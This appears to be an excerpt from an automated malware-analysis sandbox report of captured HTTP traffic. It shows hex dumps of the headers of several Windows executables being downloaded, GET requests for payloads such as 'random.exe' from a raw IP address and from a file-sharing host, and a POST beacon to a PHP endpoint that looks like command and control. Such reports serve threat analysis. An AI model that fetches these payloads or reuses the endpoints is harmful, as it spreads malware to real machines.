Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:01:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:55:17 GMTETag: "1cc400-62f9e9b507876"Accept-Ranges: bytesContent-Length: 1885184Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 c4 c6 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ac 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c ac 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 79 76 74 78 6d 75 61 00 b0 19 00 00 00 31 00 00 b0 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 79 79 7a 6f 6b 76 67 00 10 00 00 00 b0 4a 00 00 04 00 00 00 9e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 a2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:01:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:55:38 GMTETag: "1e000-62f9e9c954b7d"Accept-Ranges: bytesContent-Length: 122880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 45 05 40 5d 00 00 00 00 00 00 00 00 f0 00 2f 00 0b 02 02 32 00 62 01 00 00 7a 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 f1 01 00 c8 00 00 00 00 20 02 00 e8 05 00 00 00 d0 01 00 d4 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 f6 01 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 99 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 b5 05 01 00 00 70 00 00 00 06 01 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3d 4b 00 00 00 80 01 00 00 4c 00 00 00 66 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 d4 10 00 00 00 d0 01 00 00 12 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 23 00 00 00 f0 01 00 00 16 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 05 00 00 00 20 02 00 00 06 00 00 00 da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:01:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:56:14 GMTETag: "30d200-62f9e9ebbd2eb"Accept-Ranges: bytesContent-Length: 3199488Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 c9 c0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f0 04 00 00 b4 00 00 00 00 00 00 00 e0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 31 00 00 04 00 00 e9 92 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 20 06 00 6b 00 00 00 00 10 06 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 21 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 00 06 00 00 10 00 00 00 00 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 fc 02 00 00 00 10 06 00 00 02 00 00 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 20 06 00 00 02 00 00 00 12 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 6e 77 6d 73 64 79 70 00 a0 2a 00 00 30 06 00 00 96 2a 00 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 69 6c 6a 69 6d 6b 72 00 10 00 00 00 d0 30 00 00 06 00 00 00 aa 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 30 00 00 22 00 00 00 b0 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:01:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:55:17 GMTETag: "1cc400-62f9e9b507876"Accept-Ranges: bytesContent-Length: 1885184Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 c4 c6 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ac 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c ac 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 79 76 74 78 6d 75 61 00 b0 19 00 00 00 31 00 00 b0 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 79 79 7a 6f 6b 76 67 00 10 00 00 00 b0 4a 00 00 04 00 00 00 9e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 a2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:01:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:56:42 GMTETag: "1a6400-62f9ea0605996"Accept-Ranges: bytesContent-Length: 1729536Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 40 3d c2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 30 66 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 66 00 00 04 00 00 a0 5d 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 28 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 69 61 64 64 70 77 77 00 c0 18 00 00 60 4d 00 00 bc 18 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 69 73 72 64 69 75 6c 00 10 00 00 00 20 66 00 00 06 00 00 00 3c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 66 00 00 22 00 00 00 42 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:01:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:55:35 GMTETag: "ec600-62f9e9c6b5d45"Accept-Ranges: bytesContent-Length: 968192Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd b9 c8 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 16 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 17 51 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 48 5b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 5b 01 00 00 40 0d 00 00 5c 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 0e 00 00 76 00 00 00 50 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:01:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:55:46 GMTETag: "1aea00-62f9e9d09716d"Accept-Ranges: bytesContent-Length: 1763840Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 45 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 45 00 00 04 00 00 5c f5 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 63 6c 77 74 6c 6c 77 00 60 1a 00 00 20 2b 00 00 5c 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6c 77 79 63 64 6a 79 00 20 00 00 00 80 45 00 00 04 00 00 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 45 00 00 22 00 00 00 c8 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /dl/21790868/joblam.exe HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dl/21790868/joblam.exe HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
